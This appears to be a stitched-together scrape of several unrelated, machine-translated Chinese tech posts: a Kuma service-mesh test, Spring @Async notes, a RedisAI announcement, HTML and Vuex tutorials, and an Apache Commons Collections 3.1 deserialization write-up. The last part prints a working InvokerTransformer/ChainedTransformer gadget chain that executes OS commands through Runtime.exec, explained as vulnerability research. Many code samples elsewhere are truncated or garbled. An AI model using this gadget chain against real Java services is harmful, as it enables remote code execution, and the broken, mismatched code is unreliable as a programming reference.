Here on Istio project bookinfo code has been modified to support RATINGS_PORT configuration parameters, including the following productpage service. Run the following command to configure reviews-v1 service.


Run the following command to configure reviews-v2 service.


Run the following command to configure reviews-v3 service.


Run the following command to configure productpage-v1 service.


Open your browser, type http: // $ IP: 10501 / productpage, you can see the following results, namely bookinfo application publishing success. Refresh the page, you can see the changes in review scores.


To test the dynamic update configuration data plane, as the local port updates bookinfo / reviews and services, and executed.


View the corresponding data plane services log, you can see the new configuration updates to take effect. But the problem here is that productpage instance itself is still accessible port 10504 before, but this time could not happen Sidecar forward the port will lead to abnormal service itself. On the whole, in the Universal mode Kuma’s a good practice to plan well in advance of applications, services, instances, such as the port, upgrade update may cause a brief interruption in service.



to sum up


Kuma advantage

  1. Lightweight, light-weight, light-weight, important things to say three times, several executable program will be able to deploy the service grid infrastructure are areas;

  2. By supporting multiple Mesh obvious way to provide better isolation.


Unresolved Issues


  1. Important features not supported TrafficRoute, TrafficTracing the like, so basically Kuma still unavailable state.


  2. Two-way authentication supports only the built-in self-signed certificates, and can only be configured in Mesh range.


  3. Because they do not support similar Istio of Ingress, Egress and other functions, when open two-way authentication can not be released out of service, internal services can not access external services.


  4. To support multiple simultaneous start in Universal mode Envoy, Envoy does not support hot restart. However, due to the heat xDS configurations are updated, so the impact is not significant.


  5. In Universal mode, it does not support the service registration and discovery, the user needs to configure outbound entry-by-service application-dependent, but also because there is no integrated DNS, you need to specify inter-service access to IP: Port, rather than as designated Service Name can be like Istio . In Kubernetes mode, is dependent on the mechanism of Service, or the Hostname Service Name may be resolved to ClusterIP, then initiate a HTTP / TCP requests into Sidecar later re-forwarded.


  6. Service started the process as much as possible not to rely on access to services, this case may be due to the Sidecar and the data plane is not configured, leading to service failed to start.


  7. View Envoy’s config_dump can see that the current mode is managed in a TCP connection, did not play a strong ability of Envoy.


  8. Under Universal mode configuration data plane objects, start Sidecar services, etc. are need to be manually command the operation, more convenient and user-friendly packaging is also a must.


After this test, we can see that Kuma is currently still in the initial phase of the project, but overall technical direction is good. It is not Istio suddenly on a large and functional, the learning curve is relatively flat, so that everyone can give a good understanding of grid services bring the convenience, and the technical difficulties which exist.


One of the reasons hindering the current grid technology application service is the support for legacy systems. In general, we need to reform the old system twice, the first time a container, thus enabling it to run on Kubernetes, the second is the dismantling of RPC frames or completely replaced.


If the service can support non-mesh containers scene, then at least work can be reduced by half. We know from the start Istio v1.3 version began to support the expansion of the grid, it is also about to bare metal or virtual machine to deploy Host Integration in Kubernetes in Isito cluster. Currently supports two modes, one is single-mode network, i.e., bare metal or a virtual machine host connected to the inner or the VPC via VPN Kubernetes, another communication is implemented by the ingress gateway integrated multi-network. For now, due to the dependence on Kubernetes Istio itself is relatively heavy, coupled with other functions Istio itself have been relatively complete, in order to increase the mesh extended functionality, the workload is relatively large, so it both ways still under development.


Relatively speaking, Kuma offers a new idea to use the service grid in a virtual machine host or bare metal scene, although the completion of the current function is relatively low, but still worthy of sustained attention.



Notes @Async solve the problem of asynchronous call

Preamble: Spring in @Async

According to Spring documentation, the default uses a single-threaded mode. So in Java applications, most cases are achieved through interactive processing synchronized manner.

Then when the execution of multiple tasks is bound to affect each other. For example, if A task execution time is longer, then B must wait until the task is finished A task will start execution. Another example is when dealing with third-party systems to interact, likely to cause slow response to the situation, before most of them are using multiple threads to complete such tasks, in fact, after spring3.x, has built the perfect solution to this @Async problem.

1. What is an asynchronous call?

Before I explain, let’s look at two definitions:

Synchronous call: execution order, wait on a task is finished

The entire process is performed sequentially, when the various processes are executed, and returns the result.

Asynchronous call: receiving the instruction is executed without waiting

It is just to send a command to call, the caller without waiting for the method to be called completely finished; but continue with the following procedure.

For example, in a call, call A, B, C during three sequential method:
    As they are synchronous call, then they need to be finished after the order, the process is finished side count; if B is an asynchronous invocation method, after running A, B calls, without waiting for the completion of B, and the implementation start calling C, until after the C is finished, it means that the process is finished.


2. The conventional asynchronous call handling

After time in Java, usually in the treatment of similar scenes are created based on a separate thread asynchronous call to complete the corresponding logic through the execution flow between the main thread and the different threads, so start a separate thread, the main thread to continue without creating stagnant situation of waiting. Or use TaskExecutor perform asynchronous thread, see

3. How to enable @Async in Spring?

3.0, @ Async introduction

In Spring, the method @Async based tagging, called asynchronous methods; these methods when executed, will be executed in a separate thread, the caller without waiting for its completion, we can continue with other operations.

3.1, enable @Async comment

3.1.1, Java-based way to enable configuration:

public class SpringAsyncConfig { ... }  

3.1.2, based SpringBoot configuration mode is enabled:

public class SpringBootApplication {
    public static void main(String[] args) {, args);

3.2, using @Async annotation, declare an asynchronous method call

3.2.0 In the method using no return value:

Affirming asynchronous method to invoke methods on

    @Async //标注使用
    public void downloadFile() throws Exception { ... } 

3.2.1, the return value using methods:

public Future asyncMethodWithReturnType() {  
    System.out.println("Execute method asynchronously - "  + Thread.currentThread().getName());  
    try {  
        return new AsyncResult("hello world !!!!");  
    } catch (InterruptedException e) {  
    return null;  

Can be found in the above example, the data type returned by Future type, which is an interface. Specific results types AsyncResult, this is the place to note.

Examples of asynchronous method call returns a result:

public void testAsyncAnnotationForMethodsWithReturnType()  
   throws InterruptedException, ExecutionException {  
    System.out.println("Invoking an asynchronous method. "   + Thread.currentThread().getName());  
    Future future = asyncAnnotationExample.asyncMethodWithReturnType();  
    while (true) {  ///这里使用了循环判断,等待获取结果信息  
        if (future.isDone()) {  //判断是否执行完毕  
            System.out.println("Result from asynchronous process - " + future.get());  
        System.out.println("Continue doing something else. ");  

These asynchronous methods to obtain information about the result, is to get the current asynchronous method if finished achieved by constantly checking Future state.

4. @Async call exception handling mechanism based on

In the asynchronous method, if an exception occurs, the caller caller, it can not be perceived. If you do need for exception handling, the process is performed as follows:

    Custom implementation AsyncTaskExecutor task executor
            It is defined herein as exception handling logic and specific manner.

    Configuring TaskExecutor replaced by a custom built task executor
            Example Step 1, custom TaskExecutor

public class ExceptionHandlingAsyncTaskExecutor implements AsyncTaskExecutor {  
    private AsyncTaskExecutor executor;  
    public ExceptionHandlingAsyncTaskExecutor(AsyncTaskExecutor executor) {  
        this.executor = executor;  
    public void execute(Runnable task) {       
    public void execute(Runnable task, long startTimeout) {  
       executor.execute(createWrappedRunnable(task), startTimeout);           
    public Future submit(Runnable task) { return executor.submit(createWrappedRunnable(task));  
    public Future submit(final Callable task) {  
       return executor.submit(createCallable(task));   
    private Callable createCallable(final Callable task) {   
        return new Callable() {   
            public T call() throws Exception {   
                 try {   
                 } catch (Exception ex) {   
                     throw ex;   
    private Runnable createWrappedRunnable(final Runnable task) {   
         return new Runnable() {   
             public void run() {   
                 try {  
                  } catch (Exception ex) {   
    private void handle(Exception ex) {  
      System.err.println("Error during @Async execution: " + ex);  

Analysis: it may be found to achieve AsyncTaskExecutor, performed with a separate thread for each specific operation method. In createCallable and createWrapperRunnable, the definition of exception handling methods and mechanisms.

handle () is where exception handling in the future we need to focus on.
    xml configuration file contents:


It can also be used in the form of annotations to configure it to register the bean.

Transaction processing 5. @Async invocation

In the method @Async labeling, as well as the @Transactional be labeled; when they call database operation, the control transaction management will not produce, the reason lies in its operation is based on asynchronous processing.

How to add that the transaction manager to do these operations?

The method requires transaction management operations can be placed inside the asynchronous method, add @Transactional on internal method is called


Method A, using the @ Async / @ Transactional be marked, but not the purpose of generating transaction control.

Method B, used to mark the @Async, B calls the object C, D, C / D are respectively denoted by the @Transactional made, transaction control can be realized.

6. Reference article:



Let your AI model as close as possible data sources

Source: Redislabs Author: Pieter Cailliau, LucaAntiga translation: Kevin (Public number: Middleware little brother)

Brief introduction

Today we released a preview version of RedisAI, pre-integrated [tensor] werk components. RedisAI is a service tensors tasks and can perform tasks Redis depth learning modules. In this blog, we will introduce the function of this new module, and explain why we believe it will subvert machine learning (ML), the depth of learning solutions (DL) is. Produced RedisAI are two reasons: First, the high cost of migrating data to the host performs AI model and experience a great influence on real-time; secondly, Serving AI model has always been a challenge in the field of DevOps. Our purpose of constructing RedisAI is to allow the user can not move Redis multi-node data of the situation, but also a good service, update and integrate their own models.


Location data is important

In order to demonstrate operation of the machine learning, deep learning the importance of the position data model, we give an example of a robot chat. Chatbot usually recurrent neural network model (RNN), to address one (seq2seq) User Q & A scene. More advanced model uses two input vectors and two output vectors, and the digital intermediate state vector in a manner to preserve the context of the conversation. Model uses the last message as the user input, dialogue among representatives of state history, and its output is a response to user messages and a new intermediate state.

In order to support interactive user-defined, this intermediate state must be saved in a database, so Redis + RedisAI is a very good option, there will be the traditional program and RedisAI program to make a comparison.


1, the traditional program

To construct a bot or other application programs to use Flask integrated Spark. Upon receiving the message the user session, the server needs to obtain from the intermediate state Redis. After the Redis because there is no native Tensor data type can be used, it is necessary to deserialize and Recurrent Neural Network (RNN) in operation, ensure real intermediate state may be saved to Redis after re-serialized.


Taking into account RNN time complexity, data serialization / de-serialization overhead and a huge network overhead on the CPU, we need a better solution to ensure the user experience.


2, RedisAI program in RedisAI, we provide a data type called Tensor, just use a series of simple commands can operate on Tensor vector mainstream client. Meanwhile, we also provide two additional types of data to the runtime characteristics of the model: Models and Scripts.


Models and operation command device (CPU or GPU) and a rear end from the parameter definitions. RedisAI built a mainstream machine learning framework, such as TensorFlow, Pytorch, etc., and will soon be able to support ONNX Runtime Framework, while increasing support for the traditional machine learning model. However, it is great, its back-end Model command is not aware of:

AI.MODELRUN model_key INPUTS input_key1 …  OUTPUTS output_key1 ..

This allows the user to select the back-end coupling off (usually determined by data experts) and application services solution, the replacement model only need to set a new key can be very simple. RedisAI management model process all requests in the queue, and executes in a separate thread so that the security response Redis still other normal requests. Scripts command can be executed on a CPU or GPU, and allows the user to operate Tensors TorchScript vector, TorchScript class Python is a vector operable Tensors custom language. This may help users to preprocess the data prior to execution model can also be used in processing the results of the scenarios, for example to improve performance by integrating different models.

We plan for the future DAG supports batch execute commands through the command, which allows users to perform multiple RedisAI batch command in an atomic operation. Such as running different instances of a model on a different device, do the average forecast of the results by the script. Use DAG command calculation can be performed in parallel, and then perform the polymerization operation. If you need the full amount and deeper list of features, visit The new architecture can be simplified as:



Service can be simpler model

In a production environment, use Jupyter notebooks to write code and deploy applications are not the optimal solution in Flask. How to determine the user’s own resources is the best of it? If the user host is down, the intermediate state of the bot what happens? User-create the wheel may be repeated to achieve the existing Redis functions to solve the problem. In addition, due to the complexity of the combination regimen often than expected, stubbornly adhere to the original solution will be very challenging. RedisAI by Redis enterprise-class data storage solutions, supporting data type Tensors, Models and Scripts such as deep learning needs, to achieve a good depth of integration Redis and AI models. If you need to expand the computing power of the model, simply for Redis cluster expansion can, so users can add as many models in a production environment, thereby reducing infrastructure costs and total cost. Finally, RedisAI well adapted to the existing ecological Redis allows users to perform scripts to pre-and post-processing of user data, the data structure can be used RedisGear do the right conversion, can be used to keep data up to date RedisGraph state.


Conclusions and follow-up plans

1, in the short term, we want to use RedisAI in the case supports three major back-end (Tensorflow, Pytorch and ONNX Runtime), and stabilized as soon as possible and reaches a steady state. 2, we hope that these can be dynamically loaded the back end, users can customize the designated back-end loaded. For example, this would allow the user to use edges with Tensorflow Lite treated cases. 3, plans to achieve the automatic scheduling function can be achieved automatically merge different queues in the same model. 4, run statistical models RedisAI will be used to measure the performance of the model.

5, to complete the DAG characteristics explained hereinbefore.


More high-quality IT middleware technology / original / translation of the article / data / dry goods, please pay attention to “middleware little brother” public number!


Without JS, teach you only make a few practical effect with pure HTML pages

Please indicate the source: Grape City’s official website, Grape City to provide professional development tools for developers, solutions and services, enabling developers. Original Source: https: //

In the past, we see page effects, the effect is a lot of need to use with JS, and today in this article, I’ll show you how to use pure HTML to create practical effect of their own.

1. folded accordion

Use Details and Summary tab to create a collapsible accordion no JavaScript code.




<summary>Languages Usedsummary>
<p>This page was written in HTML and CSS. The CSS was compiled from SASS. Regardless, this could all be done in plain HTML and CSSp>

<summary>How it Workssummary>
<p>Using the sibling and checked selectors, we can determine the styling of sibling elements based on the checked state of the checkbox input element. p>


* {
    font-size: 1rem;
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
details {
    border: 1px solid #aaa;
    border-radius: 4px;
    padding: .5em .5em 0;

summary {
    font-weight: bold;
    margin: -.5em -.5em 0;
    padding: .5em;

details[open] {
    padding: .5em;

details[open] summary {
    border-bottom: 1px solid #aaa;
    margin-bottom: .5em;

Browser support:


2. progress bar

The basic elements of the label and Progress Meter on, you can adjust the properties presented on screen progress bar. Progress has two properties: max value and calibration progress bar while the Meter labels provide more custom attributes.






<label for="upload">Upload progress:label>

<meter id="upload" name="upload"
       min="0" max="100"
       low="33" high="66" optimum="80"
    at 50/100


<label for="file">File progress:label>

<progress id="file" max="100" value="70"> 70% progress>


body {
  margin: 50px;

label {
    padding-right: 10px;
    font-size: 1rem;
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;

Browser support:




3. More Input Type

When defining input elements, you have to know that modern browsers allow you to specify the type of input enough. You should already know that in addition to text, email, password, number of these types, there are those below.

    The machine will display the date date selector

    datetime-local richer date and time picker

    month-friendly selector month

    tel will let you enter a phone number. Open it on your mobile browser, the pop-up keyboard will change, the same is true of email.

    Enter the search text box to search for a friendly style.




<label for="date">Enter date:label>
<input type="date" id="date"/>

<label for="datetime">Enter date & time:label>
<input type="datetime-local" id="datetime"/>

<label for="month">Enter month:label>
<input type="month" id="month"/>

<label for="search">Search for:label>
<input type="search" id="search"/>

<label for="tel">Enter Phone:label>
<input type="tel" id="tel">


input, label {display:block; margin: 5px;}
input {margin-bottom:18px;}

A variety of new input types MDN documentation is very extensive and a great amount of information. Also, check to see keyboard input type mobile user behavior when these input elements on the mobile browser.

4. Video and Audio

video and audio elements, although now part of the HTML standard, but you would be surprised as to the label you can use video rendering a decent video player on the screen.

<video controls>

    <source src="" 

    Sorry, your browser doesn't support embedded videos.

Some attribute the video tag worthy of note include:

    poster to be displayed when downloading video URL cover

    preload whether pre-loaded when the page loads the entire video

    Whether autoplay video should play automatically when the page loads

Browser support:



5. proof text

When you want to display the history of editing and proofreading of the situation, blockquote, del and ins elements labels can come in handy.




    There is <del>nothingdel> <ins>no codeins> either good or bad, but <del>thinkingdel> <ins>running itins> makes it so.


del {
    text-decoration: line-through;
    background-color: #fbb;
    color: #555;

ins {
    text-decoration: none;
    background-color: #d4fcbc;

blockquote {
    padding-left: 15px;
    line-height: 30px;
    border-left: 3px solid #d7d7db;
    font-size: 1rem;
    background: #eee;
    width: 200px;

6. The more unified quotes

Due to the different quotes in English, using the tag gives you a good solution to this problem, it can make your content more consistently presented quotes on most browsers.




Don Corleone said <q cite="">I'm gonna make him an offer he can't refuse. Okay? I want you to leave it all to me. Go on, go back to the party.q>p>


Don Corleone said <i>"I'm gonna make him an offer he can't refuse. Okay? I want you to leave it all to me. Go on, go back to the party."i>


body {
  margin: 50px;

q {
    font-style: italic;
    color: #000000bf;


7. Keyboard tab

tag should be a little-known popular label, but can be used in this embodiment will be described better style key combination.



<p>I know that <kbd>CTRLkbd>+<kbd>Ckbd> and <kbd>CTRLkbd>+<kbd>Vkbd> a are like the most used key combinationsp>


body {
  margin: 50px;

kbd {
    display: inline-block;
    margin: 0 .1em;
    padding: .1em .6em;
    font-size: 11px;
    line-height: 1.4;
    color: #242729;
    text-shadow: 0 1px 0 #FFF;
    background-color: #e1e3e5;
    border: 1px solid #adb3b9;
    border-radius: 3px;
    box-shadow: 0 1px 0 rgba(12,13,14,0.2), 0 0 0 2px #FFF inset;
    white-space: nowrap;

8. HTML code sharing

Use figcaption pre code labels, you can use pure HTML and CSS code snippet showing nice.




      Defining a css <code>colorcode> property for a class called 'golden'
      .golden {
        color: golden;


pre {
  background-color: #ffbdbd;


This article only initiate, perhaps you have more possession of the use of skills, might also posted for everyone to share.

In addition, if you are not limited to the above efficiency, we hope to have a more complete dynamic function.

For example: You want to add Excel functionality to your page, you can try the front pure form controls SpreadJS, then, or you want to provide users with a more complete, more efficient front-end UI controls, you may wish to try WimoJS.

I do not believe they can add much color for your application.



Easy to get to know one article Vuex


Vuex is a specially developed for Vue.js application state management (official website address: https: // It uses the status of all components centralized storage management application, and a corresponding state rules to ensure a predictable manner changed.


We replaced a large vernacular: Vuex is a state management mode, you can simply understood as a global object, then we can modify the properties of this global object inside or add methods, but we can not kind of like a traditional form of direct assignment of JS to modify, we have to follow the rules Vuex provides us to modify;


There is Vuex is applied to solve the problem between the traditional values ​​of the various components, it means watching our traditional welfare vue father and components as well as the shortcomings of the traditional values ​​trouble brought us; this is the official website said very clearly:



Tip: This module will be used in the form of import and export vuex, this paper a little bit long, patiently watching the hope, of course, able to do so again knock followed would be better!

Vuex provides us with a total of four objects, namely state, mutations, getters, actions;

state: Vuex data source, public data we need to store all this, can be simply understood as a transparent warehouse, you can access the repository data sources through this $ store.state variable name;..

mutations: mutations key to this is the equivalent of the warehouse, only the modified data source to operate through the submission of mutations, which means you want to change the data inside the warehouse only be modified (this by mutations $ store.commit ( “method. name”));

getters: vue property getters computed in similar, getters return value will be modified according to changes in state of the state value depends, if the value of the state-dependent getters are not changed, the cache is read directly, if there is changes in corresponding changes will occur here, it can be used to monitor changes in the value of the state; getters here can be understood as a state of security of the warehouse, if the state of the data changes, this will take appropriate security measures to make the appropriate changes, if there is no change, then nothing had happened continued to be mixed with food to die (ha ha ha, I do not know exactly inappropriate analogy, but this is the meaning, you understand just fine, do not bar fine)

actions: actions and mutations very similar, but mutations can only synchronize the official, but there are actions you can perform asynchronous operations; that is to say we need to do asynchronous operations need to be in actions, and then submit that actions are mutations instead of directly modifying the state, that is into this warehouse modify data, can be modified to go to get the key, so the actions are submitted to the mutations go method of execution mutations;



state of usage:

First, we create a new project, we build vue environment here is not to go into details, after all, this article is about the vuex of; vuex be installed in the project:

Installation vuex command: npm install vuex –save

After installing vuex we create a new folder vuex in the src directory, and create a new file in vuex store.js folder:


import Vue from 'vue';
import Vuex from 'vuex';

const state={

export default new Vuex.Store({


Then we quote store.js in main.js in and add store the object when the object is instantiated


import Vue from 'vue'
import App from './App'
import router from './router'

Reference store.js

import store from './vuex/store' Vue.config.productionTip = false /* eslint-disable no-new */ new Vue({ el: '#app', router, //

Instantiated object is added to store

store, components: { App }, template: '' })

Then modify our App.vue file





We can see by the above code, we joined a p tag App.vue in, vuex states: If we need to read the data in vuex, which is state of the source data warehouse, we must pass this $ store.state The variable name to access


mutations usage:

If we need to modify the data source in vuex, we can modify it by submitting mutations;

First we need to add a button in our view layer to control:




Then modify our store.js:

import Vue from 'vue';
import Vuex from 'vuex';

const state={


Adding mutations objects, state parameters can get to the top of the state

const mutations={ addFunction(state){ return state.number+=1; } } //

Here we must remember to be added to instances, or will be error

export default new Vuex.Store({ state, mutations })


We can directly observe, to submit mutations modify the data source by this. $ Store.commit ( ‘method name’), of course, also possible mutations our reception parameters, the first parameter is the name of a method of mutations, a second parameters for the mutations needed to receive the parameters, so that our mutations become more flexible;


getters usage:

getters similar to computer usage vue, you can monitor the source data changes state data warehouse, if getters dependent state data has changed, getters dependent data has changed state will change

First we can add the following code in store.js:

import Vue from 'vue';
import Vuex from 'vuex';

const state={

const getters={

State is triggered by the process state above objects, the state value can be read

addFunction(state){ return state.number++; } } export default new Vuex.Store({ state, //

Here we must remember to join object instantiation

getters })


App.vue of view we can change:



Through the above code, and view layers we can clearly see that when we operate the getters and getters triggered the addFunction method, addFunction method changes the value state.number, this time has a value number is 2, so the page 2 is displayed on, because + in the post, so at this time is 1 getters, i.e. when the variation value dependent getters state.number occurring in the getters, state.number will change, If state.number not changed, this time getters will give priority to read cache;


Usage of actions:

Actions object mainly performs asynchronous operations, similar to mutations, except that actions make changes to data by submitting mutations, not directly changing the data state;

First, we can change the code store.js in:


import Vue from 'vue';
import Vuex from 'vuex';

const state={
const mutations={
    return state.number++;
const getters={
    return state.number++;

context is an object store having the same properties and methods of Examples

const actions={ addFunction(context){ context.commit("addFunction"); } } export default new Vuex.Store({ state, mutations, getters, //

Remember to instantiate here in time to add

actions })


App.vue modified code is:








Scenarios for vuex:

In project development, there may be a lot of data or parameters that we may need to read or modify many times, like a similar function cart, etc., at this time we can use vuex be achieved; after all, just a vuex state management, state management our model is to provide a convenient, but not necessary, because the state management can do can also be achieved by other means and methods. In fact, personally I feel vuex with localStorange somewhat similar, are used to store and modify data, in order to solve cross-page data loss;



Apache Commons Collections deserialize a detailed analysis of learning summary

. 0x01 environment to prepare:

Apache Commons Collections 3.1 version, download link:

jd jui address (java the jar package into source code file):

Configuration jdk version of the project:

Byte code class output path is provided

Add jar package for the project

java object array (array of objects):

object obj[]=new object[5];

Object array to create a length of 5, these null values ​​are 5 elements, and then assign the created array reference obj instance variables. If you need to assign a specific object of these elements, it is necessary to specify separately or be initialized with symbols {} arrays of array operation tools



. 0x02 environmental testing:

import java.lang.reflect.InvocationTargetException;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
public class fanshe {
    public static void main(String[] args) throws IllegalAccessException, IllegalArgumentException, InvocationTargetException, NoSuchMethodException, SecurityException, ClassNotFoundException, IOException {

Function name, passed parameter types, parameter values

Transformer transformer = new InvokerTransformer("append", new Class[]{String.class}, new Object[]{"by SecFree"}); Object newobject = transformer.transform(new StringBuffer("hi ")); System.out.println(newobject); Runtime r = (Runtime)Class.forName("java.lang.Runtime").getMethod("getRuntime", new java.lang.Class[]{}).invoke(null, new Object[]{}); System.out.println(new"whoami").getInputStream())).readLine()); } }

From the above analysis starts this simple test code,

Transformer transformer = new InvokerTransformer("append", new Class[]{String.class}, new Object[]{"by SecFree"});

InvokerTransformer first instantiate objects, passing the method name, parameter types, and the parameter values ​​to perform, when the type of incoming values ​​and types, to be defined in the java class variables consistent

Inlet parameters defined herein can also be seen that the desired type, where the type of the parameter class type of the array, then the second row

Object newobject = transformer.transform(new StringBuffer("hi"));

In this case the method is called transform-based transformer, passing an anonymous StringBuffer object, wherein the transform function is defined as follows, this function is of type Object, inlet parameters are type object,

At this time, if the input is not empty, the method will be called to give getclass current object class, the next getmethod by calling method, the method calls the class object, wherein the two parameters are passed, one of the first to call of

Class method method name, and the second parameter is the parameter type of the method call, this time getmethod return object value Method type, in which case it can be done the way we want to call the method by calling invoke the method carried out

At this time, for example using a call to complete the reflection type stringbuffer append method, and can also be seen from FIG inlet parameters of type String, append method actually passed append strings together after the currently stringbuffer string, and returns the current string.

. 0x03 principle vulnerability analysis:

This article feel the reason for this vulnerability in a very detailed, https: //

Apache Commons Collections is an extension of third-party libraries Collection structural basis of the Java standard library

org.apache.commons.collections a class package to expand and increase the standard of the Java collection framework, which means that these extensions belong to the basic concepts of collection, but nothing different functions. Java in the collection can be understood as a set of objects. Figurative collection is set, list, queue, etc., which is a collection type. Put another way to understand, collection is set, list, queue abstraction.

Which has an interface function can be invoked by any reflection, i.e. InvokeTransformer

poc as follows:

import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;

public class collections {
    public static void main(String[] args) {
        String command = (args.length !=0 ) ? args[0] : "calc";
        String[] execArgs = command.split(",");
        Transformer[] tarnsforms = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer(
                        new Class[]{String.class,Class[].class},
                        new Object[]{"getRuntime",new Class[0]}
                new InvokerTransformer(
                        new Class[] {Object.class,Object[].class},
                        new Object[] {null,new Object[0]}
                new InvokerTransformer(
                        new Class[]{String[].class},
                        new Object[]{execArgs}
        Transformer transformerChain = new ChainedTransformer(tarnsforms);
        Map temoMap = new HashMap();
        Map exMap = TransformedMap.decorate(temoMap, null, transformerChain);
        exMap.put("by", "SecFree");

poc logic can be understood as:

Construction BeforeTransformerMap value pairs, for assignment by the TransformedMap decorate method, can key Map data structure, value for transforme.

TransformedMap.decorate method, the data structure is contemplated class Map transformation, this method has three parameters. Map The first parameter is the object to be transformed, the second parameter is within the key conversion process to go through the Map object (which may be a single method may be a chain, may be empty), the third parameter is the object Map value in the conversion process to go through.

TransformedMap.decorate (target Map, key conversion object (or a single chain or a null), value of the conversion target (or single chains or null));

poc BeforeTransformerMap in the value of the conversion, when the value BeforeTransformerMap been performed a complete conversion chain, command execution is complete.

 Transformer transforms[] = {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class}, new Object[] {"getRuntime", new Class[0]} ),
new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class}, new Object[] {0, new Object[0]} ),
new InvokerTransformer("exec", new Class[] {String[].class}, new Object[] {commands} ) };

The above code is the transformer constituting the strand, this strand when the conversion is completed, i.e., the code execution is completed, the above code is equivalent to the implementation:


0x04.poc breakpoint debugging analysis:

The first step to define the command to be executed, and the definition of transformer chain, in fact, is an array of objects

Wherein the first object is an object ConstantTransformer inlet parameters Runtime.class, i.e. by way of .class, acquired object class of this class Runtime

Here iConstant assigned to the member variables ConstantTansformer class, specifically why the first class object to an object of this class, below said.

The second class object is an object InvokerTransformer class, previously known role InvokerTransformer class:

        Transformer transformer = new InvokerTransformer("append", new Class[]{String.class}, new Object[]{"by SecFree"});
        String newobject = transformer.transform(new StringBuffer("hi ")).toString();

Through the above three lines to complete the function call is completed by reflection, which must first define a InvokerTransformer class object, then the function we want to accomplish by calling the object calls transformer method of execution

Constructor its class in the first parameter is the method we want to call called getMethod, the second parameter type, and the third parameter value here is actually calling getRuntime function by getMethod

We already know that the process of reflection to get to the function you want to call by getMethod, the next step is to pass the class object we want to invoke a function triggered by, so our purpose and function of the target class all together,

So in this case shown above, the invoke method call, then the incoming parameters of the type invoke the type of the object class, object class parameters


The final step shown above, the calling exec function, code execution, when an array of parameters of type String, which can execute a plurality of commands, parameters Command that is previously defined, so far, been constructed object array Transformer,

The purpose is to create an array of functions to be performed back into the inside, will form a chain function, the next step is to create a chainedTransformer transformers as parameter object, and chainedTransformer class has a method that is a function of the array chain implementation, namely chainedTransformer of transform methods

Will in turn call iTransformers stored in an array transform method of an object, which is in turn perform the function we need

As shown in FIG put into iTransformers chain variable transformer, easy call later.


As shown above, the last three lines is the commons collections deserialization trigger, first need to construct a map object, and using java generic key to specify the type of hashmap, using the next class to decorate method TransformedMap encapsulation of the map object, role object map conversion process wherein the package is specified to be transformed and the key map object to be performed (this can also be a chain, which we assign to the transformerChain), where you can specify the key, value can also be specified, i.e., next to the keys of the map to be modified by the object put method, wherein put (Key, value) that is added to the value hashMap, in which case the trigger transformer chain decorate defined, function calls :

When single-step f7 to put functions, triggering, put method transformermap because decorate method returns the object transformermap class key at this time is first converted

When the determination of the value for the conversion valueTransformer case is empty, because we defined the transformer chain of map conversion value for



ValueTransformer is the case can be seen that the conversion chain before the decorate the package, so in this case the transformer valueTransformer method invocation, an inlet for the parameter “secfree”, a string

The first of a chain of objects transformer object ConstantTransformer class F7 single step into this time, you can see, this time transform function regardless of why the entry input, returns a iConstant, and iConstant so that we controlled, and therefore here we can return to any class, returns here as an object of class java.lang.Runtime


When the second time cycle, can be seen at this time it has become the object of an object class java.lang.Runtime


At this time, the conversion into the transform method of the second strand invoketransformer class, because we already know the transform method of the class to complete the function call, this time by .getclass () method can be obtained directly class java.lang.Runtime Types of


At this time, in fact, completed by calling the function call to invoke a function java.lang.Runtime getmethod of class (input function to be reflected by an object class), which was the parameter getRuntime () (this.iArgs),


That is, is the object’s class returned java.lang.Runtime.getruntime



The third time you enter the loop, cls is the object of the Reflect.Method class, you can call the invoke function through the GetMethod function, and the third line calls the invoke function of the GetTrunTime class to facilitate the call of the exec function.

At a time when the method is:

java.lang.reflect.Method class and class information about access rights of a single interface or method. The method may reflect class or instance method (a method including abstract).

java.lang.reflect.Method.invoke (Object obj, Object ... args) method uses the specified parameter called Method object thus underlying method represented

As shown above, we already know that the method class variable is actually stored as the method we need to access. The Method.Invoke () function returns the return value executed by the object defined by the first parameter of the invoke function and the method defined by the second parameter.

So at this point we call method.invoke to call getruntime.invoke, that is, when we enter the fourth round of loop, then object is the return value of the previous getruntime.invoke () function, which is the runtime object associated with the current Java application.

The fourth time the loop enters, the exec function is called to execute calc. At this point, the class of runtime object is java.lang.runtime is obtained by getclass, then the exec method of java.lang.runtime class is obtained by getmethod.

The third row is reflected method.invoke exec function call execution java.lang.Runtime class, is the parameter calc, i.e. then pop up calculator.

0x05. Reference: